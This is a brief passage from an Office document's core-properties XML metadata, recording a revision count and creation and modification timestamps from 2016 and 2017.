  <cp:revision>87</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-02-22T11:19:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-09T03:39:41Z</dcterms:modified>
</cp:coreProperties>
</file>